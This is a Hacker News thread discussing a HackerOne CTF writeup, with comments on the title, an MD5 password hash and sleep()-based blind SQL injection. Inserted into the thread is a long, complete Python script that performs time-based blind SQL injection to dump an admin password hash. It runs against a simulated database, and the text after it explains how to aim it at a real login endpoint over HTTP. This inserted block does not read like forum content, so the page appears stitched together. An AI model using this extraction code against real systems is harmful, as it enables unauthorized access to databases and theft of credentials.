
$50M CTF from Hackerone – Writeup - lelf
https://github.com/manoelt/50M_CTF_Writeup
======
anc84
$50M references Hackerone paying out that amount in total over all time or
something. The bounty for this CTF was $10k.

~~~
alexandercrohde
Yeah, definitely needs title change

~~~
bch
Even “M” is confusing, where financial millions are often (usually?) MM
(thousand thousands, where M == Roman 1000).

------
scrollaway
> _First recon step here is to run a port scan to discover if there is any
> service. As a result I got port 80_

Overkill much? :)

> _There is only one user ( "admin", "5f4dcc3b5aa765d61d8327deb882cf99"). Is
> that a hash? Googled it and found the answer, yes it is: md5('password').
> Now we are able to log in using admin:password or even using the sqli_

Stuff like this makes me think the author accidentally went into this stuff in
reverse order. The username/password combo seems almost expected to be
manually bruteforceable.

Also, the whole blind-querying of strings using sleep() is awesome. Is that a
common technique or did the author make it up on the spot?

~~~
thaumasiotes
Using sleep() is a common technique, recommended specifically to let you query
data even when you aren't given output from the database. As long as you can
produce an effect that you can detect, you can extract information.
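
The sleep()-based extraction described above, as an added example that is not code from the thread or from the writeup. It simulates the whole loop end to end against an in-memory SQLite database: the `users` table and the admin row are constructed from the values quoted in the writeup, the login query is deliberately built by string concatenation (the injection point), and a `sleep()` user-defined function is registered so that MySQL-style `SLEEP()` payloads behave the same way in SQLite. Everything else (function names, the `DELAY`/`THRESHOLD` values, the printable-ASCII search range) is an assumption of this example. The login function only ever answers yes or no, so the only channel is the response time; each character is recovered with a binary search over the oracle rather than one request per candidate.

```python
"""Time-based blind SQL injection, simulated end to end against SQLite.

Added example, not code from the writeup or the thread. The schema, the
admin row and the vulnerable query are constructed here to stand in for
the CTF target; names and timing constants are assumptions.
"""
import sqlite3
import time

# Constructed sample data: the one-row users table quoted in the writeup.
ADMIN_HASH = "5f4dcc3b5aa765d61d8327deb882cf99"   # md5('password')
DELAY = 0.02            # seconds of injected sleep() when the condition holds
THRESHOLD = DELAY / 2   # elapsed time above this is read as "delayed"


def make_db():
    """In-memory SQLite with a MySQL-style sleep() registered so the payloads work."""
    conn = sqlite3.connect(":memory:")
    conn.create_function("sleep", 1, lambda s: time.sleep(s) or 0)
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?)", ("admin", ADMIN_HASH))
    return conn


def vulnerable_login(conn, username, password):
    """Deliberately vulnerable login: values are concatenated into the SQL.

    Returns only a yes/no and never any column data, so the attacker is blind.
    """
    sql = ("SELECT 1 FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    return conn.execute(sql).fetchone() is not None


def timing_oracle(conn, condition):
    """True iff `condition` (a SQL boolean expression) is true on the server.

    The payload closes the string literal, ORs in a CASE that calls sleep()
    only when the condition holds, and comments out the rest of the query.
    """
    payload = "x' OR (CASE WHEN (%s) THEN sleep(%g) ELSE 0 END) -- " % (condition, DELAY)
    start = time.perf_counter()
    vulnerable_login(conn, payload, "ignored")
    return time.perf_counter() - start > THRESHOLD


def find_int(at_least, lo, hi):
    """Binary search for the integer v in [lo, hi) given an oracle for v >= x."""
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if at_least(mid):
            lo = mid
        else:
            hi = mid
    return lo


def extract_string(conn, subquery, max_len=64):
    """Pull the result of `subquery` (a scalar SELECT) out one character at a time."""
    length = find_int(
        lambda n: timing_oracle(conn, "length((%s)) >= %d" % (subquery, n)),
        0, max_len + 1)
    out = []
    for i in range(1, length + 1):
        code = find_int(
            lambda c: timing_oracle(
                conn, "unicode(substr((%s), %d, 1)) >= %d" % (subquery, i, c)),
            0x20, 0x7f)   # printable ASCII; narrow this if the column is known to be hex
        out.append(chr(code))
    return "".join(out)


def dump_admin_hash(conn):
    """Recover the admin password hash without ever seeing query output."""
    return extract_string(conn, "SELECT password FROM users WHERE username = 'admin'")


if __name__ == "__main__":
    db = make_db()
    print(dump_admin_hash(db))
```

Against a real target the same loop talks to the login endpoint over HTTP, and the threshold has to be chosen against measured network jitter (a longer delay, or repeating borderline measurements) or a noisy link will flip bits; here the in-memory database makes the contrast between a delayed and an undelayed query unambiguous.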

~~~
scrollaway
Figures :) TIL! Really cool seeing it in action.

------
JoachimS
Great writeup. Impressive to be able to find and be able to jump through so
many hoops.

Every time I see one of these I reflect on the fact that if a person is
prepared to do all this work for either lulz or some kUSD, imagine what
efforts people might be prepared to do to gain 1-10-100 MUSD.

~~~
nickpsecurity
It's why we say in high-assurance security to address each root cause as
they're understood and mitigated. Then, build that into your languages,
analyzers, etc. Ada and Rust do that for lots of code injection opportunities.
For web apps, even PHP has Airship CMS to reduce risks. Jif/Sif languages
track information flows to block leaks. Several OS's do secure-by-default
configurations. And so on and so forth.

We know these attackers may expend a lot of effort. They also have more
education, tooling, and labor out there than at any time before. Might as well
use technology that makes blocking them something we don't even think about vs
a cat and mouse game where we must consider every detail for even common
operations or apps.

------
esseti
I'm always amazed about how one person can have so many ideas to break a
system from which you know nothing.

~~~
bashwizard
A solid methodology is key.

------
sigi45
Sooo I see 50M but it is probably just click bait as they are celebrating 50M
paid out in general?

The writeup is okay though.

------
EnFinlay
Nice write-up!

